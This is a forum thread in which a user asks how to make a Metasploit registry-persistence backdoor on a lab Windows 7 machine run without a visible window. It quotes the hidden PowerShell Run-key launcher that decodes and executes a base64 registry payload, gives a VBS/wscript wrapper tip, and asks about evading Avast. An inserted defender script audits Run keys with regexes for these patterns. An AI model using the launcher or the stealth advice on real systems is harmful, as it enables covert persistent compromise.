Vurraz Posted February 7, 2018

Hello, I installed a registry_persistence backdoor on my lab machine. However, the problem is that once the victim machine boots, you can see an empty cmd prompt shell standing there for 10 seconds. And if I close that shell, then I won't get a meterpreter shell on my Kali machine. I wish to completely hide that shell on startup, to make the backdoor stealthy. I tried tinkering with the options in the registry key, but it didn't help.

This is the data written to the registry key of the backdoor by default (HKCU/Software/Microsoft/Windows/CurrentVersion/Run):

    %COMSPEC% /b /c start /b /min powershell -nop -w hidden -c "sleep 0; iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((Get-Item 'HKCU:Software\8GU6R71p').GetValue('Jg8XwoGx'))))"

I'm testing this on Windows 7 Enterprise.
thoregem Posted February 8, 2018

The problem with most Windows backdoors (including reverse shells) is that they need the window open to function. Your best bet is going to be to try and hide that window, so I've linked some Stack Exchange answers that explain how to do exactly that below. Most of these involve making the script into a VBS object, which by default runs in the background on Windows systems.

Answer #1
Answer #2
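As an added defender-side example (my own code, not from the thread or from the registry_persistence module it refers to): both the default Run-key launcher quoted in the first post and the wscript/VBS wrapper suggested in this reply leave a recognisable command string in the Run key. The PowerShell below enumerates the usual Run/RunOnce keys, flags values that match those patterns, and, when a value points at a base64 payload stored in another registry key (the `(Get-Item 'HKCU:...').GetValue('...')` construction above), decodes the first few hundred characters for display without ever executing it. The indicator names, regexes, key list and sample entries are my own assumptions, chosen to fit the strings shown in this thread.

```powershell
# Added example: audit Run/RunOnce keys for the hidden-PowerShell launcher and
# script-host wrapper patterns discussed in the thread. Not part of any tool.

$RunKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
)

# Indicator name -> regex over the raw Run value (PowerShell -match is case-insensitive).
# These are my own choices modelled on the command quoted in the first post.
$Indicators = [ordered]@{
    'comspec-start-min'   = '%COMSPEC%.*\bstart\b.*(/b|/min)'
    'powershell-hidden'   = 'powershell.*(-w(indowstyle)?\s+hidden|-nop|-noni|-enc)'
    'iex-base64'          = '(iex|invoke-expression).*FromBase64String'
    'payload-in-registry' = 'Get-Item\s+''?HK(CU|LM):.*GetValue\('
    'script-host-wrapper' = '(wscript|cscript|mshta)(\.exe)?.*\.(vbs|vbe|js|hta)\b'
}

# Returns the list of indicator names that fire on one Run value.
function Test-RunEntry {
    param([string]$Command)
    $hits = @()
    foreach ($name in $Indicators.Keys) {
        if ($Command -match $Indicators[$name]) { $hits += $name }
    }
    return ,$hits
}

# If the value fetches its payload from another registry value, decode it for
# inspection only. Unicode/base64 matches the launcher in the thread; iex is never called.
function Get-PayloadPreview {
    param([string]$Command, [int]$MaxChars = 300)
    $re = 'Get-Item\s+''(HK(?:CU|LM):[^'']+)''\)\.GetValue\(''([^'']+)''\)'
    if ($Command -notmatch $re) { return '' }
    $keyPath = $Matches[1]; $valueName = $Matches[2]
    if (-not (Test-Path $keyPath)) { return "payload key $keyPath not present" }
    try {
        $b64  = (Get-Item $keyPath).GetValue($valueName)
        $text = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($b64))
        if ($text.Length -gt $MaxChars) { $text = $text.Substring(0, $MaxChars) + '...' }
        return $text
    } catch { return "could not decode ${keyPath}\${valueName}: $($_.Exception.Message)" }
}

# Walks every Run key that exists and reports the values that match at least one indicator.
function Get-SuspiciousRunEntries {
    $providerProps = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'
    foreach ($key in $RunKeys) {
        if (-not (Test-Path $key)) { continue }
        $props = Get-ItemProperty -Path $key
        foreach ($p in $props.PSObject.Properties) {
            if ($providerProps -contains $p.Name) { continue }   # provider metadata, not a Run value
            $cmd  = [string]$p.Value
            $hits = Test-RunEntry -Command $cmd
            if ($hits.Count -eq 0) { continue }
            $preview = ''
            if ($hits -contains 'payload-in-registry') { $preview = Get-PayloadPreview -Command $cmd }
            [pscustomobject]@{
                Key        = $key
                Name       = $p.Name
                Command    = $cmd
                Indicators = ($hits -join ', ')
                Payload    = $preview
            }
        }
    }
}

# Constructed samples (not read from a real machine): the launcher quoted in the
# first post, the wscript wrapper approach from the reply, and a benign vendor entry.
$samples = @(
    '%COMSPEC% /b /c start /b /min powershell -nop -w hidden -c "sleep 0; iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((Get-Item ''HKCU:Software\8GU6R71p'').GetValue(''Jg8XwoGx''))))"',
    'wscript.exe //B "C:\Users\lab\invisible.vbs"',
    '"C:\Program Files\Vendor\updater.exe" /silent'
)
foreach ($s in $samples) {
    '[{0}] {1}' -f ((Test-RunEntry -Command $s) -join ', '), $s
}

# Live audit of this host (HKLM keys are readable without elevation on a default install):
Get-SuspiciousRunEntries | Format-List
```

Run it on the lab box after installing the backdoor: the first sample should report all four launcher indicators, the wrapper sample only `script-host-wrapper`, and the vendor entry nothing. The reason the wrapper hides the window, for the record, is that `%COMSPEC%` (cmd.exe) is a console-subsystem binary, so the system allocates a console for it regardless of `start /b /min`, while wscript.exe is a GUI-subsystem host and never gets one; the downside, from the attacker's point of view, is that a Run value launching wscript against a `.vbs` in a user profile is exactly the kind of string this check keys on.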
Vurraz (Author) Posted February 8, 2018

Thank you so much. This worked. No window is seen. I'm so grateful. I created invisible.vbs, which runs together with something.bat. The bat file is the reg key command (%COMSPEC%...). But now it seems that I will have to edit the registry_persistence.rb exploit to automatically upload invis.vbs and something.bat to the victim PC to make this work... Is this going to trigger the antivirus? What about Avast? Do you have a cleaner solution in mind, instead of uploading 2 files to the victim? Is it possible to write the .vbs and .bat source code DIRECTLY into the registry key, so that no file needs to be uploaded? If so, please show me how.